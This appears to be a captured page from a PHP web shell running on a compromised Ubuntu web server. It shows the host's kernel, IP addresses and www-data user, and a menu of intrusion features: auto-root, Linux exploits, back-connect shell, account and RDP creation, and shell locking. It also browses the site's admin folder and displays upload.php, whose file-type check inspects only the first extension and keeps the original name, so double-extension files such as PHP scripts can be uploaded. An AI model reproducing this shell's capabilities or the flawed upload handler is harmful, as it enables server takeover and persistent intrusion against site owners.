Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.141.46.108
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
kop /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
uploads
[ DIR ]
drwxrwxr-x
admin.js
888
B
-rwxr-xr-x
index.html
9.13
KB
-rwxr-xr-x
index.js
2.53
KB
-rwxr-xr-x
login.js
778
B
-rwxr-xr-x
login_session.php
230
B
-rwxr-xr-x
logout_session.php
134
B
-rwxr-xr-x
notif.php
1.18
KB
-rwxr-xr-x
onload.js
1.16
KB
-rwxr-xr-x
onload_notif.js
1.58
KB
-rwxr-xr-x
upload.php
948
B
-rwxr-xr-x
upload_notifications.html
6.32
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : upload.php
<?php if ( 0 < $_FILES['file']['error'] ) { echo 'Error: ' . $_FILES['file']['error'] . '<br>'; } else { $x = $_FILES['file']; $f_file=explode(".",$x["name"]); if($f_file[1] == 'pdf' || $f_file[1] == 'jpeg'){ $new_filename=$f_file[0].".".$f_file[1]; move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/'. $_FILES['file']['name']); }else{ $arr['msg'] = 'only pdf and jpeg files are allowed..!'; echo json_encode($arr); return; } } if($new_filename){ $arr['err_code'] = 0; $arr['status'] = 'success'; $arr['uploadedfile']='/uploads/'.$new_filename; $arr['msg'] = 'Updated Successfully...!'; echo json_encode($arr); }else { $arr['err_code'] = -1; $arr['status'] = 'Failure'; $arr['msg'] = 'Failed To update'; echo json_encode($arr); return; } ?>
Close